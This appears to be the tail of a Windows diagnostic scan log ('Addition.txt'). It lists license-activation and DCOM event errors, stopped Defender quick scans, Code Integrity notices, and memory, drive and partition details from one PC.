RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=4
Error: (10/23/2020 08:29:12 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 08:30:32 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
.
Error: (10/22/2020 08:15:31 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 08:14:44 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 07:47:54 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=3
Error: (10/22/2020 07:47:50 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 07:47:00 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=TimerEvent
System errors:
=============
Error: (10/23/2020 09:33:42 AM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.
Error: (10/23/2020 09:33:12 AM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.
Error: (10/22/2020 11:37:26 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (10/22/2020 08:19:36 PM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.
Error: (10/22/2020 08:19:06 PM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.
Error: (10/21/2020 11:41:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (10/21/2020 07:45:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Steam Client Service service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (10/21/2020 07:45:29 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.
Windows Defender:
===================================
Date: 2020-10-18 17:42:29.074
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4FFA7FDF-9D80-4665-BA2E-77A22296DD1B}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-17 23:07:35.332
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {F5CF0A25-3F7F-4DFE-A2B7-CD922B8270D3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-17 20:22:25.412
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {5AC52251-24F3-4360-9AA3-F0699B4C56D5}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-17 15:38:54.119
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {6367FC15-5410-4174-A9C4-4493178CD02C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-16 11:35:52.457
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {D30BD636-C486-4F2F-BB7E-08A596807841}
Scan Type: Antimalware
Scan Parameters: Quick Scan
CodeIntegrity:
===================================
Date: 2020-10-22 20:18:44.800
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-19 17:34:41.461
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-17 20:21:46.429
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-16 11:32:31.824
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-10 11:17:25.481
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-03 11:56:22.058
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-25 10:31:30.946
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-24 23:51:46.727
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Memory info ===========================
BIOS: American Megatrends Inc. F6 08/03/2013
Motherboard: Gigabyte Technology Co., Ltd. Z87-HD3
Processor: Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 53%
Total physical RAM: 16271.11 MB
Available physical RAM: 7532.8 MB
Total Virtual: 32655.11 MB
Available Virtual: 21352 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:232.54 GB) (Free:49.06 GB) NTFS
Drive d: (Data) (Fixed) (Total:931.51 GB) (Free:365.51 GB) NTFS
\\?\Volume{eb0d191b-1087-11e6-8250-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 92BC3579)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 28A9940F)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================